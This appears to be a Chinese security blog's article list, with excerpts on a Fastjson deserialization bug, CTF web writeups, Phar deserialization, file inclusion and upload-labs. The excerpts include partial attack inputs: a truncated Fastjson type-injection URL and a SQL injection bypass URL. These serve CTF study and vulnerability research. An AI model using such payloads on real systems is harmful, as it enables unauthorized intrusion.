- 博客(9)
- 资源 (1)
- 收藏
- 关注
原创 Cynthia - Fastjson deserialization vulnerability
This is a Fastjson deserialization vulnerability1.login fastLogin required2.Fastjson deserializationTrigger pointhttp://xx.xxx.xxx.xx/cynthia/template/saveTemplateMailConfig.do?templateId=744313&templateMailOptions={“b”:{"\u0040\u0074\u0079\u007
2022-03-25 18:42:43 3504
原创 2020网鼎杯青龙组writeup
前言网鼎杯第一场开始了,又是菜鸡自闭的一天。。。刚开始一直不放web题,让做web的有点难受呀。webAreUSerialz打开题目发现源码,是一个反序列化: <?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __constr
2020-05-25 23:40:47 754 2
原创 2020新春战疫网络安全公益赛部分web writeup
前言最近因为疫情,在家里都没怎么出门,正好i春秋平台举办了2020新春战疫网络安全公益赛。学到了一些骚姿势,师傅们都tql了。。。DAY1简单的招聘系统打开页面发现是一个登陆框,直接注册账号登陆进去。发现需要管理员登陆,才能解锁新功能。在那里xss了半天,没有结果。。。。最后重新回到登陆页面,使用万能密码登陆,发现能登进去,但是是我刚刚注册的账号,于是重新下发题目,,直接万能密码登陆,...
2020-02-25 14:43:27 1653 3
原创 2019上海市大学生网络安全大赛部分web题解
前言这周六有这个比赛,学到了一个骚姿势,在这里记录一下。easysql题目是easysql,看到这个题目感觉问题不是这简单。打开题目发现是一个未完成的页面,发现可能存在sql注入。通过简单的尝试我测试出一种绕过的方式: http://47.105.183.208:29898/article.php?id=123%27||(1)%23继续通过测试发现过滤了一些关键字符串,,or,un...
2019-11-08 18:34:05 947
原创 Phar反序列化
前言通过做题发现了Phar反序列化这个漏洞点,发现自己以前遇到过,但是都是模模糊糊的过去了。这次就好好总结一下。Phar 反序列化Phar文件结构在php>=5.3的时候,默认开启支持Phar,文件状态问为只读,而且使用phar文件不需要任何配置。php使用phar://伪协议来解析phar文件的内容。在php<5.3得时候,要将php.ini中的 phar.readonly...
2019-11-07 23:40:20 547
原创 RoarCTFweb题解
前言参加了RoarCTF,题目质量挺好的,学到了一些东西。在这里复现记录一下。easy_calc打开题目发现是一个计算器的功能,感觉计算器已经出过好多次了。查看源代码,发现了calc.php <?phperror_reporting(0);if(!isset($_GET['num'])){ show_source(__FILE__);}else{ $st...
2019-10-21 09:09:44 1776
原创 Python框架Flask基础学习
Python框架Flask基础学习简介Flask是由python实现的一个web微框架,让我们可以使用Python语言快速实现一个网站或Web服务。而且有对应的python3及python2版本。环境windows10系统python2.7(之所以是2.7而不是3.x,因为大多数库只支持2.x)已安装pip(Python包管理工具)安装建立:找一个目录建立flask文件夹安...
2019-07-31 12:45:27 183
原创 文件包含漏洞
文件包含漏洞简介文件包含这个漏洞,简单来说既是程序猿在开发中为了方便,会将在多个页面重复使用的代码单独写到一个文件中,在需要用到的地方直接包含进来,包含后的文件既相当于将被包含的整个文件内容复制到了包含处。因为在开发中是经常用到的,因此成为了攻击者的目标,便衍生了多种文件包含的攻击。在php中文件包含函数include()include_once()require()require_...
2019-06-13 21:24:08 1904
原创 upload-labs 文件上传靶场 writeup
文件上传靶场练习前言文件上传漏洞是一个高危漏洞,想要复习一下,二刷一下文件上传靶场Pass-01提示:本pass在客户端使用js对不合法图片进行检查!通过提示发现是在客户端用js进行验证的,js验证实在发送到服务器端之前而验证的,那么我们就可以在此之前做点手脚。可以先上传一个合法的文件,通过抓包来进行修改参数,就可以绕过这个限制了。Pass-02提示本pass在服务端对数据...
2019-06-05 23:49:08 1950
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人